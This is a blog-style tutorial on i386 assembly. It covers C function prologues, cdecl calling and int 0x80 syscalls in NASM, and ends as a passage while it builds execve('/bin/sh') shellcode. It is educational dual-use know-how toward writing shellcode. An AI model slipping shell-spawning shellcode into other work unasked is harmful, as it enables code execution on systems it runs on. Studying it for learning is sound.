Shellcode i386 - 0x101

jamarir

Just another c2asm / cdecl / .data / .text / int 0x80 / execve / bad chars cleanup write-up.

Reversing C code 0x101

Program

Let’s consider the following main.c code:

int add(int x, int y) {
    return x + y;
}

void main() {
    int z = add(1, 2);
    return;
}

We’ll use the following GCC command to compile:

jamarir@kali:~$ gcc -m32 -fno-pic -o main main.c

Then, we may disassemble the executable using either gdb or objdump to see the associated assembly instructions:

jamarir@kali:~$ echo "set disassembly-flavor intel" > ~/.gdbinit
jamarir@kali:~$ echo "set confirm off" >> ~/.gdbinit
jamarir@kali:~$ echo "set pagination off" >> ~/.gdbinit
jamarir@kali:~$ gdb -q main
Reading symbols from main...
(No debugging symbols found in main)

(gdb) disass add
Dump of assembler code for function add:
   0x0000117d <+0>:     push   ebp
   0x0000117e <+1>:     mov    ebp,esp
   0x00001180 <+3>:     mov    edx,DWORD PTR [ebp+0x8]
   0x00001183 <+6>:     mov    eax,DWORD PTR [ebp+0xc]
   0x00001186 <+9>:     add    eax,edx
   0x00001188 <+11>:    pop    ebp
   0x00001189 <+12>:    ret
End of assembler dump.

(gdb) disass main
Dump of assembler code for function main:
   0x0000118a <+0>:     push   ebp
   0x0000118b <+1>:     mov    ebp,esp
   0x0000118d <+3>:     sub    esp,0x10
   0x00001190 <+6>:     push   0x2
   0x00001192 <+8>:     push   0x1
   0x00001194 <+10>:    call   0x117d <add>
   0x00001199 <+15>:    add    esp,0x8
   0x0000119c <+18>:    mov    DWORD PTR [ebp-0x4],eax
   0x0000119f <+21>:    nop
   0x000011a0 <+22>:    leave
   0x000011a1 <+23>:    ret
End of assembler dump.
jamarir@kali:~$ objdump -M intel -d -j .text main
[...]
Disassembly of section .text:
[...]

0000117d <add>:
    117d:       55                      push   ebp
    117e:       89 e5                   mov    ebp,esp
    1180:       8b 55 08                mov    edx,DWORD PTR [ebp+0x8]
    1183:       8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
    1186:       01 d0                   add    eax,edx
    1188:       5d                      pop    ebp
    1189:       c3                      ret

0000118a <main>:
    118a:       55                      push   ebp
    118b:       89 e5                   mov    ebp,esp
    118d:       83 ec 10                sub    esp,0x10
    1190:       6a 02                   push   0x2
    1192:       6a 01                   push   0x1
    1194:       e8 e4 ff ff ff          call   117d <add>
    1199:       83 c4 08                add    esp,0x8
    119c:       89 45 fc                mov    DWORD PTR [ebp-0x4],eax
    119f:       90                      nop
    11a0:       c9                      leave
    11a1:       c3                      ret

Prologue

As we can see, both functions start with a similar pattern, known as the function’s prologue:

push ebp
mov    ebp, esp
sub    esp, N

This prologue saves the caller’s “program state” when execution enters a function. Its main purpose is to save the base register ebp (or more registers, if applicable) onto the stack before setting ebp to esp.

The base register is used to perform lookups on local variables (using [ebp - N]) and function’s inputs (using [ebp + N]).

Then, the stack pointer is decreased by some amount to reserve space for local variables. For instance, in the main function, we declared one variable, int z, whose size is 4 bytes. Given that one stack slot is 4 bytes (32 bits), the stack here makes room for 4 slots (0x10 = 16 bytes):

    118d:       83 ec 10                sub    esp,0x10

Therefore, this decrease would be enough to store 4 integers for example. See how sub esp, 0x10 is kept with 4 integers declared in main:

int add(int x, int y) {
    return x + y;
}

void main() {
    int z = add(1, 2);
    int a = 1;
    int b = 2;
    int c = 3;
    return;
}
jamarir@kali:~$ gcc -m32 -fno-pic -o main main.c; objdump -M intel -d -j .text main
[...]
0000118a <main>:
    118a:       55                      push   ebp
    118b:       89 e5                   mov    ebp,esp
    118d:       83 ec 10                sub    esp,0x10
[...]

While declaring a fifth integer requires more space into the stack:

int add(int x, int y) {
    return x + y;
}

void main() {
    int z = add(1, 2);
    int a = 1;
    int b = 2;
    int c = 3;
    int d = 4;
    return;
}
jamarir@kali:~$ gcc -m32 -fno-pic -o main main.c; objdump -M intel -d -j .text main
[...]
0000118a <main>:
    118a:       55                      push   ebp
    118b:       89 e5                   mov    ebp,esp
    118d:       83 ec 20                sub    esp,0x20
[...]

Here, 0x20 = 32 bytes is enough to hold the 5 integers, which need 20 bytes.

The stack pointer isn’t decreased by the exact amount needed (e.g. sub esp, 0x4 if one integer is declared) because GCC keeps the stack pointer 16-byte aligned by default (-mpreferred-stack-boundary=4, i.e. 2^4 bytes), so the reserved space is rounded up to a multiple of 16 bytes.

Lowering that alignment to 4 bytes with the -mpreferred-stack-boundary=2 GCC flag makes the sub esp, N instruction use the smallest possible N:

  • 1 local integer (4 bytes) declaration:
void main() {
    int z = add(1, 2);
    return;
}
jamarir@kali:~$ gcc -m32 -fno-pic -mpreferred-stack-boundary=2 -o main main.c
jamarir@kali:~$ objdump -M intel -d -j .text main
[...]
0000118a <main>:
    118a:       55                      push   ebp
    118b:       89 e5                   mov    ebp,esp
    118d:       83 ec 04                sub    esp,0x4
[...]
  • 2 local integers (8 bytes) declaration:
void main() {
    int z = add(1, 2);
    int a = 0;
    return;
}
jamarir@kali:~$ gcc -m32 -fno-pic -mpreferred-stack-boundary=2 -o main main.c
jamarir@kali:~$ objdump -M intel -d -j .text main
[...]
0000118a <main>:
    118a:       55                      push   ebp
    118b:       89 e5                   mov    ebp,esp
    118d:       83 ec 08                sub    esp,0x8
[...]
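
The reservations observed in this section are consistent with simply rounding the size of the locals up to the stack boundary. Here is a minimal Python sketch of that model. reserved_stack_bytes is a hypothetical helper, and GCC’s real frame layout depends on more than this, so treat it as an approximation that happens to reproduce the values above:

```python
def reserved_stack_bytes(local_bytes, boundary=16):
    """Round the space needed by locals up to the next multiple of `boundary`."""
    if local_bytes <= 0:
        return 0
    # Ceiling division, then back to bytes.
    return -(-local_bytes // boundary) * boundary


# (number of 4-byte ints, stack boundary in bytes) as compiled in this section
for ints, boundary in [(1, 16), (4, 16), (5, 16), (1, 4), (2, 4)]:
    n = reserved_stack_bytes(4 * ints, boundary)
    print(f"{ints} int(s), {boundary}-byte boundary: sub esp, {n:#x}")
```

The 16-byte boundary corresponds to the default build, and the 4-byte one to -mpreferred-stack-boundary=2.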

Call

When we execute the call instruction at address 1194 in the main function:

0000117d <add>:
[...]

0000118a <main>:
[...]
    1192:       6a 01                   push   0x1
    1194:       e8 e4 ff ff ff          call   117d <add>
    1199:       83 c4 08                add    esp,0x8

call actually performs 2 operations, a push and a jump:

push <eip + opcode_size>
jmp 117d

The push saves the address of the instruction to resume at once the called function returns. Here, we want to push 1199, i.e. eip + 5 = 1194 + 5, where 5 is the size of the call opcode: e8 e4 ff ff ff. That saved eip is also called the return address (RET).
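
The 4 bytes following e8 are a signed, little-endian displacement relative to the return address, which is why the opcode contains e4 ff ff ff rather than 117d. A short Python sketch (decode_call is a hypothetical helper written for this article’s dump) recovers both addresses:

```python
import struct


def decode_call(address, opcode):
    """Return (return_address, target) for a 5-byte `call rel32` (opcode e8)."""
    if len(opcode) != 5 or opcode[0] != 0xE8:
        raise ValueError("expected a 5-byte e8 call")
    (rel32,) = struct.unpack("<i", opcode[1:])   # signed little-endian displacement
    return_address = address + len(opcode)       # what call pushes on the stack
    target = (return_address + rel32) & 0xFFFFFFFF
    return return_address, target


ret, target = decode_call(0x1194, bytes.fromhex("e8e4ffffff"))
print(hex(ret), hex(target))  # 0x1199 0x117d
```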

Epilogue

Finally, each function executes its epilogue. The epilogue restores the execution state as it was before entering the function, i.e. restoring:

  • esp to ebp, if the stack pointer has been altered within the function.

  • ebp to its backup via a pop ebp instruction.

  • eip to its backup via a ret (equivalent to pop eip) instruction.

0000117d <add>:
[...]
    1188:       5d                      pop    ebp
    1189:       c3                      ret

0000118a <main>:
[...]
    11a0:       c9                      leave
    11a1:       c3                      ret

As we can see, the add function executed a pop ebp in its epilogue, while main executed leave instead. leave is equivalent to restoring both esp and ebp, i.e.:

mov esp, ebp
pop ebp

add’s epilogue doesn’t restore esp from ebp because esp wasn’t altered in that function:


0000117d <add>:
    117d:       55                      push   ebp
    117e:       89 e5                   mov    ebp,esp
    1180:       8b 55 08                mov    edx,DWORD PTR [ebp+0x8]
    1183:       8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
    1186:       01 d0                   add    eax,edx
    1188:       5d                      pop    ebp
    1189:       c3                      ret

If, however, we forced an esp alteration into add, then its epilogue would effectively be:

mov esp, ebp
pop ebp
ret

Or:

leave
ret

As shown below, where a local res declaration implies a sub esp,0x10 instruction:

int add(int x, int y) {
    int res = x + y;
    return res;
}

void main() {
    int z = add(1, 2);
    return;
}
0000117d <add>:
    117d:       55                      push   ebp
    117e:       89 e5                   mov    ebp,esp
    1180:       83 ec 10                sub    esp,0x10
    1183:       8b 55 08                mov    edx,DWORD PTR [ebp+0x8]
    1186:       8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
    1189:       01 d0                   add    eax,edx
    118b:       89 45 fc                mov    DWORD PTR [ebp-0x4],eax
    118e:       8b 45 fc                mov    eax,DWORD PTR [ebp-0x4]
    1191:       c9                      leave
    1192:       c3                      ret

cdecl Calling Conventions

When calling the add function:

int add(int x, int y) {
    return x + y;
}

void main() {
    int z = add(1, 2);
    return;
}

We see that the function’s arguments 1 and 2 are pushed onto the stack in reverse order before the call:

0000118a <main>:
    118a:       55                      push   ebp
    118b:       89 e5                   mov    ebp,esp
    118d:       83 ec 10                sub    esp,0x10
    1190:       6a 02                   push   0x2
    1192:       6a 01                   push   0x1
    1194:       e8 e4 ff ff ff          call   117d <add>

That’s because the calling convention is __cdecl, default for C and C++ programs, which states that the arguments should be pushed from right to left (i.e. 2 first, then 1 for add(1, 2)).

The fact that all arguments are pushed before the call generally applies to 32-bit x86 only. On 64-bit x86, the first arguments are passed in registers instead, and only the remaining ones are pushed onto the stack.

Therefore, right before executing the call at address 1194, the stack holds, from high to low addresses: the saved ebp? (which ebp points to), the 4 slots reserved for local variables (z being at [ebp-4]), then the arguments 2 and 1 (which esp points to).

In any stack representation here, the high addresses are at the bottom, while the low addresses are at the top: as the x86 stack grows towards low addresses, the top of the stack is drawn at the top. Please, don’t do the opposite (i.e. stack-top at bottom…) :’(

First, main’s prologue saved the ebp register of its caller, annotated ebp?.

We don’t know which function that ebp? belongs to, but we don’t care. Even if we don’t see the caller’s own push ebp instruction, we know that ebp always points to its backed up value.

Then, it declared a z variable in our main function. Therefore, the stack pointer made room for 4 slots (the single integer being rounded up by the stack alignment) as we saw earlier (sub esp, 0x10). Finally, it pushed the 2 arguments onto the stack to prepare the add(1, 2) call.

When we enter the add function, it performs its prologue, so the stack’s state becomes:

0000117d <add>:
    117d:       55                      push   ebp
    117e:       89 e5                   mov    ebp,esp

As the call instruction implicitly stored main’s eip (the return address), it has been pushed before saving main’s ebp.

Notice how ebp is pointing to its backed up value.

Now that we saved our main’s registers, we can set ebp to esp for local and input lookups in add(). As [ebp] holds the saved ebp and [ebp+0x4] the return address, [ebp+0x8] is the function’s first argument, and [ebp+0xc] is the second one. This explains the next instructions:

0000117d <add>:
    117d:       55                      push   ebp
    117e:       89 e5                   mov    ebp,esp
    1180:       8b 55 08                mov    edx,DWORD PTR [ebp+0x8]
    1183:       8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]
    1186:       01 d0                   add    eax,edx

edx is set to 1, and eax to 2. Finally, we add edx into eax, which equals 3.
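
To make these offsets concrete, here is a small Python model of the stack replaying main’s prologue, the cdecl call and add’s prologue and epilogue. It is only a sketch: Stack32 and simulate_add_call are hypothetical names, and the starting esp and ebp values are made up, as the real ones depend on the process.

```python
class Stack32:
    """Tiny model of a 32-bit stack: a dict of 4-byte slots plus esp."""

    def __init__(self, esp):
        self.esp = esp
        self.slots = {}

    def push(self, value):
        self.esp -= 4                      # the stack grows towards low addresses
        self.slots[self.esp] = value & 0xFFFFFFFF

    def pop(self):
        value = self.slots[self.esp]
        self.esp += 4
        return value


def simulate_add_call():
    stack = Stack32(esp=0xFFFFD000)        # hypothetical starting esp
    ebp = 0xFFFFD100                       # hypothetical caller's ebp ("ebp?")

    # main's prologue
    stack.push(ebp)                        # push ebp
    ebp = stack.esp                        # mov ebp, esp
    main_ebp = ebp
    stack.esp -= 0x10                      # sub esp, 0x10

    # cdecl: arguments pushed right to left, then the call
    stack.push(2)                          # push 0x2
    stack.push(1)                          # push 0x1
    stack.push(0x1199)                     # call: pushes the return address

    # add's prologue
    stack.push(ebp)                        # push ebp
    ebp = stack.esp                        # mov ebp, esp

    frame = {
        "saved_ebp": stack.slots[ebp],
        "ret": stack.slots[ebp + 0x4],
        "x": stack.slots[ebp + 0x8],
        "y": stack.slots[ebp + 0xC],
    }
    eax = frame["x"] + frame["y"]          # add eax, edx

    # add's epilogue, then the caller's cleanup
    ebp = stack.pop()                      # pop ebp
    eip = stack.pop()                      # ret
    stack.esp += 8                         # add esp, 0x8
    return frame, eax, ebp == main_ebp, eip


frame, eax, ebp_restored, eip = simulate_add_call()
print(frame, eax, ebp_restored, hex(eip))
```

The frame dictionary shows the saved ebp at [ebp], the return address at [ebp+0x4], and the two arguments at [ebp+0x8] and [ebp+0xc].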

Again, add() executes its epilogue, which puts the stack into the following state when pop ebp is executed:

    1188:       5d                      pop    ebp
    1189:       c3                      ret

Return value

Back into the main function, we see that the value at ebp-4 (i.e. [ebp-4] = z in our case) is set to eax:

    1194:       e8 e4 ff ff ff          call   117d <add>
    1199:       83 c4 08                add    esp,0x8
    119c:       89 45 fc                mov    DWORD PTR [ebp-0x4],eax
    119f:       90                      nop
    11a0:       c9                      leave
    11a1:       c3                      ret

Indeed, for 32-bit programs, if a function returns a value, it implicitly stores it into eax. Therefore, z = add(1, 2) = 3. At the instruction at address 11a0 (i.e. before main’s epilogue), the stack is back to its state from before the arguments were pushed (add esp,0x8 removed them), with z = 3 stored at [ebp-4].

Writing ASM code 0x101

Now that we have a basic understanding of how assembly works, let’s write our first assembly script.

HelloWorld (.data)

.data & .text sections

Consider the following ASM script:

BITS 32
section .data
        msg db "Hello World!",0x0a

section .text
global _start
_start:
        ; write(1, msg, 14)
        mov ebx, 1
        mov ecx, msg
        mov edx, 14
        mov eax, 4
        int 80h

        ; exit(0)
        mov ebx, 0
        mov eax, 1
        int 0x80

Compiled using the Makefile:

jamarir@kali:~$ cat Makefile
NASM=nasm
LD=ld
fasm=helloworld1

elf:
    $(NASM) $(fasm).asm -f elf32 -g
    $(LD) $(fasm).o -o $(fasm).elf -m elf_i386

clean:
    rm *.o *.elf 2>/dev/null
jamarir@kali:~$ make
nasm helloworld1.asm -f elf32 -g
ld helloworld1.o -o helloworld1.elf -m elf_i386

N.B.: The indentation at the beginning of the Makefile’s recipe lines MUST be a single tab character, not spaces.

When executed, it effectively prints Hello World!:

jamarir@kali:~$ ./helloworld1.elf
Hello World!

First, we specified that our program will be using the 32-bit architecture:

BITS 32

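Then, we used the .data section to declare our string in a variable named msg, which contains Hello World! followed by \n, i.e. 13 bytes (so the length of 14 passed to write also sends the byte that follows msg in memory; 13 would be the exact length):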

section .data
        msg db "Hello World!",0x0a

That .data section is used to declare static / global variables that can be used in our code, itself stored in the .text section.

_start symbol

The _start symbol tells the linker where our program should start. Thus:

  • If the _start symbol is missing, the entry point defaults to the beginning of the .text section:

      [...]
      section .text
              ; write(1, msg, 14)
              mov ebx, 1
              mov ecx, msg
              mov edx, 14
              mov eax, 4
              int 80h
    
              ; exit(0)
              mov ebx, 0
              mov eax, 1
              int 0x80
    
      jamarir@kali:~$ make
      nasm helloworld1.asm -f elf32 -g
      ld helloworld1.o -o helloworld1.elf -m elf_i386
      ld: warning: cannot find entry symbol _start; defaulting to 08049000
    
      jamarir@kali:~$ objdump -M intel -d -j .text helloworld1.elf
      [...]
      08049000 <.text>:
       8049000:       bb 01 00 00 00          mov    ebx,0x1
      [...]
    
      jamarir@kali:~$ ./helloworld1.elf
      Hello World!
    
  • If the _start symbol is defined, then the program starts wherever the symbol is placed (here right before exit(0), so the write call is never executed):

      [...]
      section .text
      global _start
              ; write(1, msg, 14)
              mov ebx, 1
              mov ecx, msg
              mov edx, 14
              mov eax, 4
              int 80h
      _start:
              ; exit(0)
              mov ebx, 0
              mov eax, 1
              int 0x80
    
      jamarir@kali:~$ objdump -M intel -d -j .text helloworld1.elf
      [...]
      08049000 <_start-0x16>:
       8049000:       bb 01 00 00 00          mov    ebx,0x1
       8049005:       b9 00 a0 04 08          mov    ecx,0x804a000
       804900a:       ba 0e 00 00 00          mov    edx,0xe
       804900f:       b8 04 00 00 00          mov    eax,0x4
       8049014:       cd 80                   int    0x80
    
      08049016 <_start>:
       8049016:       bb 00 00 00 00          mov    ebx,0x0
       804901b:       b8 01 00 00 00          mov    eax,0x1
       8049020:       cd 80                   int    0x80
    
      jamarir@kali:~$ ./helloworld1.elf
      [no output]
    

Software interruption in 80 hours ?

Finally, in the .text section, we called 2 functions, i.e. write() and exit():

; write(1, msg, 14)
mov ebx, 1
mov ecx, msg
mov edx, 14
mov eax, 4
int 80h
; exit(0)
mov ebx, 0
mov eax, 1
int 0x80

To do so, we used the magical int 80h instruction (software interrupt 80h). This allows us to perform system calls (aka. syscalls). In a Linux distribution, the 32-bit syscalls are listed in the /usr/include/asm/unistd_32.h header:

jamarir@kali:~$ cat /usr/include/asm/unistd_32.h
#ifndef _ASM_UNISTD_32_H
#define _ASM_UNISTD_32_H

#define __NR_restart_syscall 0
#define __NR_exit 1
#define __NR_fork 2
#define __NR_read 3
#define __NR_write 4
#define __NR_open 5
#define __NR_close 6
#define __NR_waitpid 7
#define __NR_creat 8
#define __NR_link 9
#define __NR_unlink 10
#define __NR_execve 11
#define __NR_chdir 12
[...]

And the calling convention is documented in section 2 of the manual, in the syscall page (man man lists the manual’s sections):

jamarir@kali:~$ man man

jamarir@kali:~$ man 2 syscall

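For i386, it states that the syscall number goes into eax, the arguments into ebx, ecx, edx, esi, edi and ebp (in that order), and the return value comes back in eax. Every syscall’s signature is documented in section 2 as well. For example, man 2 exit gives the exit() syscall’s signature: void _exit(int status).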

If we want to call exit(0) to close the program, we must:

  • Set eax to 1, i.e. the syscall number of exit.

  • Set ebx to 0, i.e. the first syscall’s argument.

  • Perform the system call using the int 80h (or int 0x80) instruction.

; exit(0)
mov ebx, 0
mov eax, 1
int 80h

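For write(1, msg, 14), the syscall’s signature is ssize_t write(int fd, const void *buf, size_t count).

Thus, we set ebx to the file descriptor, ecx to the buffer’s address, edx to the number of bytes to write, and eax to the syscall number (4):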

; write(1, msg, 14)
mov ebx, 1
mov ecx, msg
mov edx, 14
mov eax, 4
int 80h
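
The same mapping can be written down once and reused for any syscall. The Python sketch below is only an illustration: syscall_registers is a hypothetical helper, and the SYSCALLS table is just the subset of unistd_32.h quoted above.

```python
# Registers carrying the arguments of an i386 `int 0x80` syscall, in order.
ARG_REGISTERS = ("ebx", "ecx", "edx", "esi", "edi", "ebp")

# Subset of the syscall numbers listed in unistd_32.h above.
SYSCALLS = {"exit": 1, "read": 3, "write": 4, "open": 5, "close": 6, "execve": 11}


def syscall_registers(name, *args):
    """Map a syscall name and its arguments to the registers to load."""
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("too many arguments for int 0x80")
    registers = {"eax": SYSCALLS[name]}        # eax always holds the syscall number
    registers.update(zip(ARG_REGISTERS, args)) # arguments fill ebx, ecx, edx, ...
    return registers


print(syscall_registers("write", 1, "msg", 14))
print(syscall_registers("exit", 0))
```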

If, for example, we set the file descriptor to the standard error output (2) and redirect it to /dev/null, the text isn’t shown:

; write(2, msg, 14)
mov ebx, 2
mov ecx, msg
mov edx, 14
mov eax, 4
int 80h
jamarir@kali:~$ ./helloworld1.elf 2>/dev/null
jamarir@kali:~$ ./helloworld1.elf
Hello World!

Similarly, writing 5 characters only, i.e. Hello (write stops after the given count, so neither the rest of the string nor the newline is printed), would result in the following output:

; write(1, msg, 5)
mov ebx, 1
mov ecx, msg
mov edx, 5
mov eax, 4
int 80h
jamarir@kali:~$ ./helloworld1.elf
Hello

HelloWorld (.text)

Another way to print our Hello World text is to exclusively use the stack, with no .data section:

BITS 32
section .text
global _start
_start:
        ; write(1, "Hello World\n", 14)
        mov ebx, 1
        push 0
        push 0x0a646c72 ; "\ndlr"
        push 0x6f57206f ; "oW o"
        push 0x6c6c6548 ; "lleH"
        mov ecx, esp
        mov edx, 14
        mov eax, 4
        int 80h

        ; exit(0)
        mov ebx, 0
        mov eax, 1
        int 0x80
jamarir@kali:~$ make
jamarir@kali:~$ ./helloworld2.elf
Hello World

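When the whole string is pushed, the stack holds, from esp towards high addresses, the slots 0x6c6c6548, 0x6f57206f, 0x0a646c72 and 0x00000000.

First, we push the string terminator NULL (0) on the stack. write() doesn’t need it, as it takes an explicit length, but it lets tools such as gdb’s x/s find the end of the string. Note that Hello World\n is 12 bytes long, so the length of 14 also writes 2 of these NULL bytes.

Second, it should be noted that x86 is a little-endian architecture: within a stack slot, the least significant byte (on the right when written as a hexadecimal number) is stored at the lowest address, and the most significant byte (on the left) at the highest. Finally, the way variables are read onto the stack is opposite to the way they’re written. Therefore:

  • We write data on the stack from bottom to top (pushing values for example).

  • We read data on the stack from top to bottom (popping values for example).

Thus, Hello World must be pushed backwards for it to be read Hello World.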

For instance, if we consider the following C program:

#include <stdio.h>
void main() {
    char *s = "ABCD";
    printf("%c", *(s+1));
    return;
}

It prints 'B', where s is pointing to the first character of the string ('A'), and s+1 the second ('B'):

jamarir@kali:~$ gcc main.c; ./a.out
B

Therefore, data is read towards increasing addresses.

Once our string is pushed, we can set the second write’s argument to esp, so that it references our string:

        mov ecx, esp

Finally, we call write and exit with int 80h, as usual.
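
Computing the pushed values by hand is error-prone, so here is a minimal Python sketch doing it for us. push_words is a hypothetical helper, and it assumes the string has already been padded to a multiple of 4 bytes:

```python
import struct


def push_words(data):
    """Return the 32-bit values to push, in order, so that `data` ends up at esp."""
    if len(data) % 4:
        raise ValueError("pad the data to a multiple of 4 bytes first")
    # "<I" reads each 4-byte chunk as a little-endian unsigned integer.
    words = [struct.unpack("<I", data[i:i + 4])[0] for i in range(0, len(data), 4)]
    return words[::-1]  # the last chunk is pushed first


for word in push_words(b"Hello World\n"):
    print(f"push {word:#010x}")
```

For Hello World\n, this yields the same three values as the pushes in the script above.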

The individual pushes can be seen in gdb using the x/Nx $sp command:

jamarir@kali:~$ gdb -q helloworld2.elf
Reading symbols from helloworld2.elf...
(gdb) disass _start
Dump of assembler code for function _start:
   0x08049000 <+0>:     mov    ebx,0x1
   0x08049005 <+5>:     push   0x0
   0x08049007 <+7>:     push   0xa646c72
   0x0804900c <+12>:    push   0x6f57206f
   0x08049011 <+17>:    push   0x6c6c6548
   0x08049016 <+22>:    mov    ecx,esp
   0x08049018 <+24>:    mov    edx,0xe
   0x0804901d <+29>:    mov    eax,0x4
   0x08049022 <+34>:    int    0x80
   0x08049024 <+36>:    mov    ebx,0x0
   0x08049029 <+41>:    mov    eax,0x1
   0x0804902e <+46>:    int    0x80
End of assembler dump.

(gdb) break *_start+22
(gdb) run
(gdb) x/4x $sp
0xffffce30:     0x6c6c6548      0x6f57206f      0x0a646c72      0x00000000

In particular, we see that esp is 0xffffce30, thus the first 2 characters read from esp are at esp+0 and esp+1, i.e. H (0x48) and e (0x65):

(gdb) info registers
eax            0x0                 0
ecx            0x0                 0
edx            0x0                 0
ebx            0x1                 1
esp            0xffffce30          0xffffce30
ebp            0x0                 0x0
esi            0x0                 0
edi            0x0                 0
eip            0x8049016           0x8049016 <_start+22>
[...]

(gdb) x/2c $esp
0xffffce30:     72 'H'  101 'e'

While the string (until a NULL byte is found on the stack) is:

(gdb) x/s $esp
0xffffce30:     "Hello World\n"
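
The link between the x/4x words and the x/s string can be checked outside gdb as well. The Python sketch below simply packs the four words shown above as little-endian values and cuts the result at the first NULL byte:

```python
import struct

# The four words printed by `x/4x $sp`, from the lowest address upwards.
words = [0x6C6C6548, 0x6F57206F, 0x0A646C72, 0x00000000]

memory = struct.pack("<4I", *words)   # bytes as they are laid out in memory
text = memory.split(b"\x00", 1)[0]    # what x/s shows: everything before the first NUL

print(memory)
print(text)
```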

FileWrite

Open

Using the same methodology, we can write an assembly script that writes a string into a file via the write syscall.

First, we need a file descriptor (fd) to a file using the open() syscall, whose signature is int open(const char *pathname, int flags, mode_t mode).

We’ll first push "./file.txt" for the pathname in our ASM script (using CyberChef to make the little-endian writing easier):

BITS 32
section .text
global _start
_start:
    ; open("./file.txt", O_CREAT | O_RDWR, 644)
    push 0
    push 0x7478742e
    push 0x656c6966
    push 0x2f2f2f2e
    mov ebx, esp

Notice that we added 2 slashes: .///file.txt. That’s because if we only pushed ./file.txt, the instruction would end up being:

    push 0
    push 0x7478742e
    push 0x656c6966
    push 0x2f2e      ; equivalent to "push 0x00002f2e"

But in such a case, the last push instruction would push 2 NULL bytes (because the push / pop instructions can only work with a whole slot, i.e. 4 bytes, a dword, for 32-bit programs), leaving the bytes "./", then two NULL bytes, then "file.txt" at esp.

As a result, when our pathname string is read by the program, it would be interpreted as "./", because the NULL byte at esp+2 terminated it earlier than expected. To prevent such string termination, we add redundant, and insignificant, slashes.
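
Both cases can be replayed in Python. This is only a sketch: stack_string is a hypothetical helper rebuilding the bytes found at esp after a series of pushes, and posixpath.normpath is used merely to show that the extra slashes don’t change which file is designated:

```python
import posixpath
import struct


def stack_string(pushed_words):
    """Bytes found at esp after pushing `pushed_words` in order, cut at the first NUL."""
    # The last value pushed sits at the lowest address, hence the reversal.
    memory = b"".join(struct.pack("<I", w) for w in reversed(pushed_words))
    return memory.split(b"\x00", 1)[0]


short = stack_string([0, 0x7478742E, 0x656C6966, 0x2F2E])       # push 0x2f2e
padded = stack_string([0, 0x7478742E, 0x656C6966, 0x2F2F2F2E])  # push 0x2f2f2f2e

print(short, padded)
print(posixpath.normpath(padded.decode()))
```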

The open’s flags are defined in the /usr/include/x86_64-linux-gnu/bits/fcntl-linux.h or /usr/include/asm-generic/fcntl.h header files:

jamarir@kali:~$ grep -rni 'O_RDWR' /usr/include/
[...]
/usr/include/asm-generic/fcntl.h:22:#define O_RDWR              00000002
/usr/include/x86_64-linux-gnu/bits/fcntl-linux.h:45:#define O_RDWR                   02
[...]
jamarir@kali:~$ grep '^#\s*define' /usr/include/asm-generic/fcntl.h
[...]
#define _ASM_GENERIC_FCNTL_H
#define O_ACCMODE       00000003
#define O_RDONLY        00000000
#define O_WRONLY        00000001
#define O_RDWR          00000002
#define O_CREAT         00000100        /* not fcntl */
#define O_EXCL          00000200        /* not fcntl */
#define O_NOCTTY        00000400        /* not fcntl */
#define O_TRUNC         00001000        /* not fcntl */
#define O_APPEND        00002000
[...]

In our case, we want the O_CREAT (create the file if it doesn’t exist) and O_RDWR (open for reading and writing) flags. We combine them with an OR operation (which here equals adding them up, as they share no bit), giving the octal flag 100 | 2 = 102.

    mov ecx, 0q102

This is an octal (102) representation of our flags, in base 8, which can be translated into decimal (66) using the following C program:

#include <fcntl.h>
#include <stdio.h>
void main() {
    printf("%o\n", O_CREAT | O_RDWR); // prints 102
    printf("%d\n", O_CREAT | O_RDWR); // prints 66
    return;
}

NASM scripts support octal representations, using a o suffix, or 0q prefix for example.

Similarly, we set the mode (permissions of the created file) to octal 644 as the third parameter, which goes into edx:

    mov edx, 0q644
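
The flag and mode values can also be double-checked in Python, whose 0o prefix plays the same role as NASM’s 0q. This is a small sketch using the octal constants copied from the header above rather than the ones of the machine running it:

```python
import stat

# Octal values copied from /usr/include/asm-generic/fcntl.h above.
O_RDWR = 0o2
O_CREAT = 0o100

flags = O_CREAT | O_RDWR
mode = 0o644

print(oct(flags), flags)                    # octal and decimal forms of the flags
print(oct(mode), mode)                      # octal and decimal forms of the mode
print(stat.filemode(stat.S_IFREG | mode))   # permission string of a regular file
```

The last line prints the permission string that ls -l would show for a regular file created with that mode, assuming the umask doesn’t clear any of its bits.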

Finally, the syscall number of open is 5.

jamarir@kali:~$ grep 'open ' /usr/include/asm/unistd_32.h
#define __NR_open 5
    mov eax, 5
    int 0x80

Write

open’s result (the file descriptor) being returned in eax, we can copy it into ebx, the first parameter of the write syscall:

    mov ebx, eax

Then, we can write AAAABBBB in the file for example, pushing that 8-character buffer onto the stack and pointing ecx, our second argument, to it:

    push 0
    push 0x42424242
    push 0x41414141
    mov ecx, esp

And set the length to be written to 8 characters, before calling the write syscall:

jamarir@kali:~$ grep 'write' /usr/include/asm/unistd_32.h
#define __NR_write 4
    mov edx, 8
    mov eax, 4
    int 0x80

Close & Exit

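The next instructions should be self-explanatory now (otherwise, press ALT+F4, or CTRL+W). Note that ebx still holds the file descriptor from the write call, so close(fd) only needs eax to be set: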

    mov eax, 6
    int 0x80

    mov eax, 1
    int 0x80

For reference, the whole NASM script is:

BITS 32
section .text
global _start
_start:
    ; open("./file.txt", O_CREAT | O_RDWR, 644)
    push 0
    push 0x7478742e
    push 0x656c6966
    push 0x2f2f2f2e
    mov ebx, esp
    mov ecx, 0q102
    mov edx, 0q644
    mov eax, 5
    int 0x80

    ; write(fd, "AAAABBBB", 8)
    mov ebx, eax
    push 0
    push 0x42424242
    push 0x41414141
    mov ecx, esp
    mov edx, 8
    mov eax, 4
    int 0x80

    ; close(fd)
    mov eax, 6
    int 0x80

    ; exit()
    mov eax, 1
    int 0x80

Which produces the following ./file.txt:

jamarir@kali:~$ nasm writefile.asm -f elf32 -g
jamarir@kali:~$ ld writefile.o -o writefile.elf -m elf_i386
jamarir@kali:~$ ./writefile.elf
jamarir@kali:~$ ls -ld file.txt |sed -e 's/ .*//'
-rw-r--r--
jamarir@kali:~$ cat file.txt
AAAABBBB

Shell execve

The execve syscall can be used to execute a binary from the file system. In its simplest yet sufficient form, we may spawn a shell using the following call:

#include <unistd.h>
void main() {
    char *argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL );
}
jamarir@kali:~$ ./main
$ echo Hello
Hello

Then, we could use the following ASM script to do the same:

BITS 32
section .text
global _start
_start:
    ; "//bin/sh"
    push 0
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp
    ; { "//bin/sh", NULL }
